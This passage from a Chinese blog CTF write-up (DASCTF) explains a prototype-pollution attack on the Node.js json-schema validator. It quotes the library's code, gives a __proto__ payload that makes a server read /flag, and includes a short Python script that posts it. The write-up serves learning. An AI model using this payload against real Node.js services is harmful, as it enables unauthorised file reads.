class="line">		// 						message: which indicates what the error was</span><br><span class="line">		//</span><br><span class="line">		return validate(instance, schema, &#123;changing: false&#125;);//, coerce: false, existingOnly: false&#125;);</span><br><span class="line">	&#125;;</span><br><span class="line">exports.checkPropertyChange = function(/*Any*/value,/*Object*/schema, /*String*/property) &#123;</span><br><span class="line">		// Summary:</span><br><span class="line">		// 		The checkPropertyChange method will check to see if an value can legally be in property with the given schema</span><br><span class="line">		// 		This is slightly different than the validate method in that it will fail if the schema is readonly and it will</span><br><span class="line">		// 		not check for self-validation, it is assumed that the passed in value is already internally valid.</span><br><span class="line">		// 		The checkPropertyChange method will return the same object type as validate, see JSONSchema.validate for</span><br><span class="line">		// 		information.</span><br><span class="line">		//</span><br><span class="line">		return validate(value, schema, &#123;changing: property || &quot;property&quot;&#125;);</span><br><span class="line">	&#125;;</span><br><span class="line">var validate = exports._validate = function(/*Any*/instance,/*Object*/schema,/*Object*/options) &#123;</span><br><span class="line"></span><br><span class="line">	if (!options) options = &#123;&#125;;</span><br><span class="line">	var _changing = options.changing;</span><br><span class="line"></span><br><span class="line">	function getType(schema)&#123;</span><br><span class="line">		return schema.type || (primitiveConstructors[schema.name] == schema &amp;&amp; schema.name.toLowerCase());</span><br><span class="line">	&#125;</span><br><span class="line">	var errors = [];</span><br><span class="line">	// validate a value against a property definition</span><br><span class="line">	function checkProp(value, schema, path,i)&#123;</span><br><span class="line"></span><br><span class="line">		var l;</span><br><span class="line">		path += path ? typeof i == &#x27;number&#x27; ? &#x27;[&#x27; + i + &#x27;]&#x27; : typeof i == &#x27;undefined&#x27; ? &#x27;&#x27; : &#x27;.&#x27; + i : i;</span><br><span class="line">		function addError(message)&#123;</span><br><span class="line">			errors.push(&#123;property:path,message:message&#125;);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		if((typeof schema != &#x27;object&#x27; || schema instanceof Array) &amp;&amp; (path || typeof schema != &#x27;function&#x27;) &amp;&amp; !(schema &amp;&amp; getType(schema)))&#123;</span><br><span class="line">			if(typeof schema == &#x27;function&#x27;)&#123;</span><br><span class="line">				if(!(value instanceof schema))&#123;</span><br><span class="line">					addError(&quot;is not an instance of the class/constructor &quot; + schema.name);</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;else if(schema)&#123;</span><br><span class="line">				addError(&quot;Invalid schema/property definition &quot; + schema);</span><br><span class="line">			&#125;</span><br><span class="line">			return null;</span><br><span class="line">		&#125;</span><br><span class="line">		if(_changing &amp;&amp; schema.readonly)&#123;</span><br><span class="line">			addError(&quot;is a readonly field, it can not be changed&quot;);</span><br><span class="line">		&#125;</span><br><span class="line">		if(schema[&#x27;extends&#x27;])&#123; // if it extends another schema, it must pass that schema as well</span><br><span class="line">			checkProp(value,schema[&#x27;extends&#x27;],path,i);</span><br><span class="line">		&#125;</span><br><span class="line">		// validate a value against a type definition</span><br><span class="line">		function checkType(type,value)&#123;</span><br><span class="line">			if(type)&#123;</span><br><span class="line">				if(typeof type == &#x27;string&#x27; &amp;&amp; type != &#x27;any&#x27; &amp;&amp;</span><br><span class="line">						(type == &#x27;null&#x27; ? value !== null : typeof value != type) &amp;&amp;</span><br><span class="line">						!(value instanceof Array &amp;&amp; type == &#x27;array&#x27;) &amp;&amp;</span><br><span class="line">						!(value instanceof Date &amp;&amp; type == &#x27;date&#x27;) &amp;&amp;</span><br><span class="line">						!(type == &#x27;integer&#x27; &amp;&amp; value%1===0))&#123;</span><br><span class="line">					return [&#123;property:path,message:value + &quot; - &quot; + (typeof value) + &quot; value found, but a &quot; + type + &quot; is required&quot;&#125;];</span><br><span class="line">				&#125;</span><br><span class="line">				if(type instanceof Array)&#123;</span><br><span class="line">					var unionErrors=[];</span><br><span class="line">					for(var j = 0; j &lt; type.length; j++)&#123; // a union type</span><br><span class="line">						if(!(unionErrors=checkType(type[j],value)).length)&#123;</span><br><span class="line">							break;</span><br><span class="line">						&#125;</span><br><span class="line">					&#125;</span><br><span class="line">					if(unionErrors.length)&#123;</span><br><span class="line">						return unionErrors;</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;else if(typeof type == &#x27;object&#x27;)&#123;</span><br><span class="line">					var priorErrors = errors;</span><br><span class="line">					errors = [];</span><br><span class="line">					checkProp(value,type,path);</span><br><span class="line">					var theseErrors = errors;</span><br><span class="line">					errors = priorErrors;</span><br><span class="line">					return theseErrors;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			return [];</span><br><span class="line">		&#125;</span><br><span class="line">		if(value === undefined)&#123;</span><br><span class="line">			if(schema.required)&#123;</span><br><span class="line">				addError(&quot;is missing and it is required&quot;);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;else&#123;</span><br><span class="line">			errors = errors.concat(checkType(getType(schema),value));</span><br><span class="line">			if(schema.disallow &amp;&amp; !checkType(schema.disallow,value).length)&#123;</span><br><span class="line">				addError(&quot; disallowed value was matched&quot;);</span><br><span class="line">			&#125;</span><br><span class="line">			if(value !== null)&#123;</span><br><span class="line">				if(value instanceof Array)&#123;</span><br><span class="line">					if(schema.items)&#123;</span><br><span class="line">						var itemsIsArray = schema.items instanceof Array;</span><br><span class="line">						var propDef = schema.items;</span><br><span class="line">						for (i = 0, l = value.length; i &lt; l; i += 1) &#123;</span><br><span class="line">							if (itemsIsArray)</span><br><span class="line">								propDef = schema.items[i];</span><br><span class="line">							if (options.coerce)</span><br><span class="line">								value[i] = options.coerce(value[i], propDef);</span><br><span class="line">							errors.concat(checkProp(value[i],propDef,path,i));</span><br><span class="line">						&#125;</span><br><span class="line">					&#125;</span><br><span class="line">					if(schema.minItems &amp;&amp; value.length &lt; schema.minItems)&#123;</span><br><span class="line">						addError(&quot;There must be a minimum of &quot; + schema.minItems + &quot; in the array&quot;);</span><br><span class="line">					&#125;</span><br><span class="line">					if(schema.maxItems &amp;&amp; value.length &gt; schema.maxItems)&#123;</span><br><span class="line">						addError(&quot;There must be a maximum of &quot; + schema.maxItems + &quot; in the array&quot;);</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;else if(schema.properties || schema.additionalProperties)&#123;</span><br><span class="line">					errors.concat(checkObj(value, schema.properties, path, schema.additionalProperties));</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema.pattern &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; !value.match(schema.pattern))&#123;</span><br><span class="line">					addError(&quot;does not match the regex pattern &quot; + schema.pattern);</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema.maxLength &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; value.length &gt; schema.maxLength)&#123;</span><br><span class="line">					addError(&quot;may only be &quot; + schema.maxLength + &quot; characters long&quot;);</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema.minLength &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; value.length &lt; schema.minLength)&#123;</span><br><span class="line">					addError(&quot;must be at least &quot; + schema.minLength + &quot; characters long&quot;);</span><br><span class="line">				&#125;</span><br><span class="line">				if(typeof schema.minimum !== &#x27;undefined&#x27; &amp;&amp; typeof value == typeof schema.minimum &amp;&amp;</span><br><span class="line">						schema.minimum &gt; value)&#123;</span><br><span class="line">					addError(&quot;must have a minimum value of &quot; + schema.minimum);</span><br><span class="line">				&#125;</span><br><span class="line">				if(typeof schema.maximum !== &#x27;undefined&#x27; &amp;&amp; typeof value == typeof schema.maximum &amp;&amp;</span><br><span class="line">						schema.maximum &lt; value)&#123;</span><br><span class="line">					addError(&quot;must have a maximum value of &quot; + schema.maximum);</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema[&#x27;enum&#x27;])&#123;</span><br><span class="line">					var enumer = schema[&#x27;enum&#x27;];</span><br><span class="line">					l = enumer.length;</span><br><span class="line">					var found;</span><br><span class="line">					for(var j = 0; j &lt; l; j++)&#123;</span><br><span class="line">						if(enumer[j]===value)&#123;</span><br><span class="line">							found=1;</span><br><span class="line">							break;</span><br><span class="line">						&#125;</span><br><span class="line">					&#125;</span><br><span class="line">					if(!found)&#123;</span><br><span class="line">						addError(&quot;does not have a value in the enumeration &quot; + enumer.join(&quot;, &quot;));</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				if(typeof schema.maxDecimal == &#x27;number&#x27; &amp;&amp;</span><br><span class="line">					(value.toString().match(new RegExp(&quot;\\.[0-9]&#123;&quot; + (schema.maxDecimal + 1) + &quot;,&#125;&quot;))))&#123;</span><br><span class="line">					addError(&quot;may only have &quot; + schema.maxDecimal + &quot; digits of decimal places&quot;);</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		return null;</span><br><span class="line">	&#125;</span><br><span class="line">	// validate an object against a schema</span><br><span class="line">	function checkObj(instance,objTypeDef,path,additionalProp)&#123;</span><br><span class="line"></span><br><span class="line">		if(typeof objTypeDef ==&#x27;object&#x27;)&#123;</span><br><span class="line">			if(typeof instance != &#x27;object&#x27; || instance instanceof Array)&#123;</span><br><span class="line">				errors.push(&#123;property:path,message:&quot;an object is required&quot;&#125;);</span><br><span class="line">			&#125;</span><br><span class="line">			</span><br><span class="line">			for(var i in objTypeDef)&#123; </span><br><span class="line">				if(objTypeDef.hasOwnProperty(i))&#123;</span><br><span class="line">					var value = instance[i];</span><br><span class="line">					// skip _not_ specified properties</span><br><span class="line">					if (value === undefined &amp;&amp; options.existingOnly) continue;</span><br><span class="line">					var propDef = objTypeDef[i];</span><br><span class="line">					// set default</span><br><span class="line">					if(value === undefined &amp;&amp; propDef[&quot;default&quot;])&#123;</span><br><span class="line">						value = instance[i] = propDef[&quot;default&quot;];</span><br><span class="line">					&#125;</span><br><span class="line">					if(options.coerce &amp;&amp; i in instance)&#123;</span><br><span class="line">						value = instance[i] = options.coerce(value, propDef);</span><br><span class="line">					&#125;</span><br><span class="line">					checkProp(value,propDef,path,i);</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		for(i in instance)&#123;</span><br><span class="line">			if(instance.hasOwnProperty(i) &amp;&amp; !(i.charAt(0) == &#x27;_&#x27; &amp;&amp; i.charAt(1) == &#x27;_&#x27;) &amp;&amp; objTypeDef &amp;&amp; !objTypeDef[i] &amp;&amp; additionalProp===false)&#123;</span><br><span class="line">				if (options.filter) &#123;</span><br><span class="line">					delete instance[i];</span><br><span class="line">					continue;</span><br><span class="line">				&#125; else &#123;</span><br><span class="line">					errors.push(&#123;property:path,message:&quot;The property &quot; + i +</span><br><span class="line">						&quot; is not defined in the schema and the schema does not allow additional properties&quot;&#125;);</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			var requires = objTypeDef &amp;&amp; objTypeDef[i] &amp;&amp; objTypeDef[i].requires;</span><br><span class="line">			if(requires &amp;&amp; !(requires in instance))&#123;</span><br><span class="line">				errors.push(&#123;property:path,message:&quot;the presence of the property &quot; + i + &quot; requires that &quot; + requires + &quot; also be present&quot;&#125;);</span><br><span class="line">			&#125;</span><br><span class="line">			value = instance[i];</span><br><span class="line">			if(additionalProp &amp;&amp; (!(objTypeDef &amp;&amp; typeof objTypeDef == &#x27;object&#x27;) || !(i in objTypeDef)))&#123;</span><br><span class="line">				if(options.coerce)&#123;</span><br><span class="line">					value = instance[i] = options.coerce(value, additionalProp);</span><br><span class="line">				&#125;</span><br><span class="line">				checkProp(value,additionalProp,path,i);</span><br><span class="line">			&#125;</span><br><span class="line">			if(!_changing &amp;&amp; value &amp;&amp; value.$schema)&#123;</span><br><span class="line">				errors = errors.concat(checkProp(value,value.$schema,path,i));</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		return errors;</span><br><span class="line">	&#125;</span><br><span class="line">	if(schema)&#123;</span><br><span class="line">		checkProp(instance,schema,&#x27;&#x27;,_changing || &#x27;&#x27;);</span><br><span class="line">	&#125;</span><br><span class="line">	if(!_changing &amp;&amp; instance &amp;&amp; instance.$schema)&#123;</span><br><span class="line">		checkProp(instance,instance.$schema,&#x27;&#x27;,&#x27;&#x27;);</span><br><span class="line">	&#125;</span><br><span class="line">	return &#123;valid:!errors.length,errors:errors&#125;;</span><br><span class="line">&#125;;</span><br><span class="line">exports.mustBeValid = function(result)&#123;</span><br><span class="line">	//	summary:</span><br><span class="line">	//		This checks to ensure that the result is valid and will throw an appropriate error message if it is not</span><br><span class="line">	// result: the result returned from checkPropertyChange or validate</span><br><span class="line">	if(!result.valid)&#123;</span><br><span class="line">		throw new TypeError(result.errors.map(function(error)&#123;return &quot;for property &quot; + error.property + &#x27;: &#x27; + error.message;&#125;).join(&quot;, \n&quot;));</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">return exports;</span><br><span class="line">&#125;));</span><br></pre></td></tr></table></figure>
<p>从json_schema数据结构，我们可以知道，它首先会调用checkType()函数来验证Type字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line">	function checkType(type,value)&#123;</span><br><span class="line">		if(type)&#123;</span><br><span class="line">			if(typeof type == &#x27;string&#x27; &amp;&amp; type != &#x27;any&#x27; &amp;&amp;</span><br><span class="line">					(type == &#x27;null&#x27; ? value !== null : typeof value != type) &amp;&amp;</span><br><span class="line">					!(value instanceof Array &amp;&amp; type == &#x27;array&#x27;) &amp;&amp;</span><br><span class="line">					!(value instanceof Date &amp;&amp; type == &#x27;date&#x27;) &amp;&amp;</span><br><span class="line">					!(type == &#x27;integer&#x27; &amp;&amp; value%1===0))&#123;</span><br><span class="line">				return [&#123;property:path,message:value + &quot; - &quot; + (typeof value) + &quot; value found, but a &quot; + type + &quot; is required&quot;&#125;];</span><br><span class="line">			&#125;</span><br><span class="line">			if(type instanceof Array)&#123;</span><br><span class="line">				var unionErrors=[];</span><br><span class="line">				for(var j = 0; j &lt; type.length; j++)&#123; // a union type</span><br><span class="line">					if(!(unionErrors=checkType(type[j],value)).length)&#123;</span><br><span class="line">						break;</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				if(unionErrors.length)&#123;</span><br><span class="line">					return unionErrors;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;else if(typeof type == &#x27;object&#x27;)&#123;</span><br><span class="line">				var priorErrors = errors;</span><br><span class="line">				errors = [];</span><br><span class="line">				checkProp(value,type,path);</span><br><span class="line">				var theseErrors = errors;</span><br><span class="line">				errors = priorErrors;</span><br><span class="line">				return theseErrors;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		return [];</span><br><span class="line">	&#125;</span><br><span class="line">	if(value === undefined)&#123;</span><br><span class="line">		if(schema.required)&#123;</span><br><span class="line">			addError(&quot;is missing and it is required&quot;);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		errors = errors.concat(checkType(getType(schema),value));</span><br><span class="line">		if(schema.disallow &amp;&amp; !checkType(schema.disallow,value).length)&#123;</span><br><span class="line">			addError(&quot; disallowed value was matched&quot;);</span><br><span class="line">		&#125;</span><br><span class="line">		if(value !== null)&#123;</span><br><span class="line">			if(value instanceof Array)&#123;</span><br><span class="line">				if(schema.items)&#123;</span><br><span class="line">					var itemsIsArray = schema.items instanceof Array;</span><br><span class="line">					var propDef = schema.items;</span><br><span class="line">					for (i = 0, l = value.length; i &lt; l; i += 1) &#123;</span><br><span class="line">						if (itemsIsArray)</span><br><span class="line">							propDef = schema.items[i];</span><br><span class="line">						if (options.coerce)</span><br><span class="line">							value[i] = options.coerce(value[i], propDef);</span><br><span class="line">						errors.concat(checkProp(value[i],propDef,path,i));</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema.minItems &amp;&amp; value.length &lt; schema.minItems)&#123;</span><br><span class="line">					addError(&quot;There must be a minimum of &quot; + schema.minItems + &quot; in the array&quot;);</span><br><span class="line">				&#125;</span><br><span class="line">				if(schema.maxItems &amp;&amp; value.length &gt; schema.maxItems)&#123;</span><br><span class="line">					addError(&quot;There must be a maximum of &quot; + schema.maxItems + &quot; in the array&quot;);</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;else if(schema.properties || schema.additionalProperties)&#123;</span><br><span class="line">				errors.concat(checkObj(value, schema.properties, path, schema.additionalProperties));</span><br><span class="line">			&#125;</span><br><span class="line">			if(schema.pattern &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; !value.match(schema.pattern))&#123;</span><br><span class="line">				addError(&quot;does not match the regex pattern &quot; + schema.pattern);</span><br><span class="line">			&#125;</span><br><span class="line">			if(schema.maxLength &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; value.length &gt; schema.maxLength)&#123;</span><br><span class="line">				addError(&quot;may only be &quot; + schema.maxLength + &quot; characters long&quot;);</span><br><span class="line">			&#125;</span><br><span class="line">			if(schema.minLength &amp;&amp; typeof value == &#x27;string&#x27; &amp;&amp; value.length &lt; schema.minLength)&#123;</span><br><span class="line">				addError(&quot;must be at least &quot; + schema.minLength + &quot; characters long&quot;);</span><br><span class="line">			&#125;</span><br><span class="line">			if(typeof schema.minimum !== &#x27;undefined&#x27; &amp;&amp; typeof value == typeof schema.minimum &amp;&amp;</span><br><span class="line">					schema.minimum &gt; value)&#123;</span><br><span class="line">				addError(&quot;must have a minimum value of &quot; + schema.minimum);</span><br><span class="line">			&#125;</span><br><span class="line">			if(typeof schema.maximum !== &#x27;undefined&#x27; &amp;&amp; typeof value == typeof schema.maximum &amp;&amp;</span><br><span class="line">					schema.maximum &lt; value)&#123;</span><br><span class="line">				addError(&quot;must have a maximum value of &quot; + schema.maximum);</span><br><span class="line">			&#125;</span><br><span class="line">			if(schema[&#x27;enum&#x27;])&#123;</span><br><span class="line">				var enumer = schema[&#x27;enum&#x27;];</span><br><span class="line">				l = enumer.length;</span><br><span class="line">				var found;</span><br><span class="line">				for(var j = 0; j &lt; l; j++)&#123;</span><br><span class="line">					if(enumer[j]===value)&#123;</span><br><span class="line">						found=1;</span><br><span class="line">						break;</span><br><span class="line">					&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				if(!found)&#123;</span><br><span class="line">					addError(&quot;does not have a value in the enumeration &quot; + enumer.join(&quot;, &quot;));</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			if(typeof schema.maxDecimal == &#x27;number&#x27; &amp;&amp;</span><br><span class="line">				(value.toString().match(new RegExp(&quot;\\.[0-9]&#123;&quot; + (schema.maxDecimal + 1) + &quot;,&#125;&quot;))))&#123;</span><br><span class="line">				addError(&quot;may only have &quot; + schema.maxDecimal + &quot; digits of decimal places&quot;);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	return null;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由于我们的目的是将checkObj函数中的propDef[‘default’]修改为/flag，造成原型链的污染</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(value === undefined &amp;&amp; propDef[&quot;default&quot;])&#123;</span><br><span class="line">	value = instance[i] = propDef[&quot;default&quot;];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而在checkType()函数中，如果要执行checkObj()函数，要满足</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#125;else if(schema.properties || schema.additionalProperties)&#123;</span><br><span class="line">	errors.concat(checkObj(value, schema.properties, path, schema.additionalProperties));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以其中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">value = &#123;&quot;$schema&quot;: &#123;&quot;properties&quot;: &#123;&quot;__proto__&quot;: &#123;&quot;properties&quot;: &#123;&quot;path&quot;:</span><br><span class="line">&#123;&quot;default&quot;: &quot;/flag&quot;&#125;&#125;&#125;&#125;&#125;&#125;</span><br><span class="line"></span><br><span class="line">schema.properties = &#123;&quot;__proto__&quot;: &#123;&quot;properties&quot;: &#123;&quot;path&quot;: &#123;&quot;default&quot;:</span><br><span class="line">&quot;/flag&quot;&#125;&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>而它循环进入checkProp函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">	for(var i in objTypeDef)&#123; </span><br><span class="line">		if(objTypeDef.hasOwnProperty(i))&#123;</span><br><span class="line">			var value = instance[i];</span><br><span class="line">			// skip _not_ specified properties</span><br><span class="line">			if (value === undefined &amp;&amp; options.existingOnly) continue;</span><br><span class="line">			var propDef = objTypeDef[i];</span><br><span class="line">			// set default</span><br><span class="line">			if(value === undefined &amp;&amp; propDef[&quot;default&quot;])&#123;</span><br><span class="line">				value = instance[i] = propDef[&quot;default&quot;];</span><br><span class="line">			&#125;</span><br><span class="line">			if(options.coerce &amp;&amp; i in instance)&#123;</span><br><span class="line">				value = instance[i] = options.coerce(value, propDef);</span><br><span class="line">			&#125;</span><br><span class="line">			checkProp(value,propDef,path,i);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后经过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for(var i in objTypeDef)</span><br></pre></td></tr></table></figure>
<p>再次进入checkObj函数，此时传入参数为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">value = prototype</span><br><span class="line">schema.properties = &#123;&quot;path&quot;: &#123;&quot;default&quot;: &quot;/flag&quot;&#125;&#125;</span><br><span class="line">path = &quot;__proto__&quot;</span><br></pre></td></tr></table></figure>

<p>此时的value参数已经被指向Function.prototype，再次在这里进行赋值时，instance此时指向Function.prototype，参数i为path，即被propDef[‘default’]修改为/flag，造成原型链污染</p>
<p>其中__proto__的属性来读取或设置当前对象的prototype对象的，目前所有浏览器都有这个属性</p>
<p>所以我们最后进行原型链污染后，可以通过config.js文件中的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">let content = fs.readFileSync(p).toString()</span><br></pre></td></tr></table></figure>
<p>来读取，所以最后post提交</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> &#123;&quot;$schema&quot;: &#123;&quot;properties&quot;: &#123;&quot;__proto__&quot;: &#123;&quot;properties&quot;:</span><br><span class="line">&#123;&quot;path&quot;: &#123;&quot;default&quot;: &quot;/flag&quot;&#125;&#125;&#125;&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>借用了大佬的脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">url = &quot;&quot;</span><br><span class="line">flag = r&quot;DASCTF&#123;&quot;</span><br><span class="line">def sol():</span><br><span class="line"> try:</span><br><span class="line"> print(url+&quot;validated/&quot;)</span><br><span class="line"> data = &#123;&quot;$schema&quot;: &#123;&quot;properties&quot;: &#123;&quot;__proto__&quot;: &#123;&quot;properties&quot;:</span><br><span class="line">&#123;&quot;path&quot;: &#123;&quot;default&quot;: &quot;/flag&quot;&#125;&#125;&#125;&#125;&#125;&#125;</span><br><span class="line"> print(data)</span><br><span class="line"> r = requests.post(url=url+&quot;validated/&quot;, json=data, timeout=10)</span><br><span class="line"> print(r.text)</span><br><span class="line"> if flag in r.text:</span><br><span class="line"> return True</span><br><span class="line"> else:</span><br><span class="line"> return False</span><br><span class="line"> except Exception as e:</span><br><span class="line"> return False</span><br><span class="line"></span><br><span class="line">sol()</span><br></pre></td></tr></table></figure>
<p>就可以读取flag了</p>
<p>参考文章：[<a target="_blank" rel="noopener" href="https://www.cnblogs.com/zyh-code/p/10970110.html]">https://www.cnblogs.com/zyh-code/p/10970110.html]</a></p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/10/02/%E6%AD%A3%E5%88%99%E7%BB%95%E8%BF%87/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          正则过滤
        
      </div>
    </a>
  
  
    <a href="/2021/09/30/%E5%8F%8D%E5%BC%B9shell%E4%BB%A5%E5%8F%8Aproc%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">反弹shell以及proc虚拟文件系统</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="json_schema原型链污染" data-title="json_schema原型链污染(nodejs)" data-url="http://example.com/2021/10/01/json_schema%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/"  data-images="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" data-content="json_schema原型链污染(nodejs)">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2021 John Doe
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
